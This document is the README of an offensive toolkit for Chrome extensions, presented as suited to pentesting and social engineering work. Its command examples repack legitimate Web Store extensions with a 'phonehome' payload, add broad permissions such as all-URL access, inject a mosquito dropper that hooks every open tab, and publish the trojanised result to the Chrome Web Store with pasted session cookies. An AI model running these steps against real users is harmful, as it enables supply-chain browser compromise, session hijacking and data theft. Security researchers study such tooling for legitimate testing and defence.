Various tools for dealing with Chrome Extensions, especially valuable for pentesting / social engineering assignments.

Authors:
 
 - Krzysztof Kotowicz - @kkotowicz - [blog](http://blog.kotowicz.net)
 - Michele '@antisnatchor' Orru


Injector
--------
Bunch of scripts for injecting existing extensions with new code:
Extensions can be downloaded from Chrome WebStore (repacker-webstore) or taken from crx files (repacker-crx).

Requirements:
 
 - bash
 - ruby
 - zip (cmd line)
 - curl (cmd line)
 - Google Chrome (used in crx mode only)

Usage:

    # get extension from Web Store, add payloads/phonehome.js and copy the extension to repacked-dir/
    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk dir repacked-dir payloads/phonehome.js

    # Same, but pack into repacked.zip instead
    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js
    
    # Create new CRX with Google Chrome
    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk crx repacked.crx payloads/phonehome.js

    # Inject into existing CRX file
    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js

    # Add some permissions into manifest.json
    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js "tabs,proxy"
    
    # Add persistent content script file launching on every tab
    $ echo 'console.log(location.href)' > cs.js
    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js

For example - mass poisoning every tab with [mosquito](https://github.com/koto/mosquito):

    # start mosquito server:
    $ cd path/to/mosquito 
    $ python mosquito/start.py 8082 4444 --http 8000

    # generate mosquito hook:
    # - visit http://localhost:8000/generate
    # - save hook as cs.js

    # inject mosquito dropper into extension:
    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js


Webstore Uploader
-----------------
Script for uploading and publishing Chrome Extensions packed in zip files in Chrome Web Store

Requirements: 

 - ruby

Usage:

    # Preparation:

    1. Create Chrome developer account
    2. Login at https://chrome.google.com/webstore/developer/dashboard/
    3. Pay your $5 one time fee (credit card needed)
    4. Get SID, SSID, HSID cookies and paste their values in webstore_uploader/config.rb file

    # Get Chrome extension code
    #  e.g. run Injector in zip mode:

    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js

    # (optional) - prepare screenshot / description file

    # publish the extension right away
    $ ruby webstore_uploader/webstore_upload.rb repacked.zip publish description.txt screenshot.png

    # or just upload & save it:
    $ ruby webstore_uploader/webstore_upload.rb repacked.zip save description.txt screenshot.png

    # you can access the extension from your developer dashboard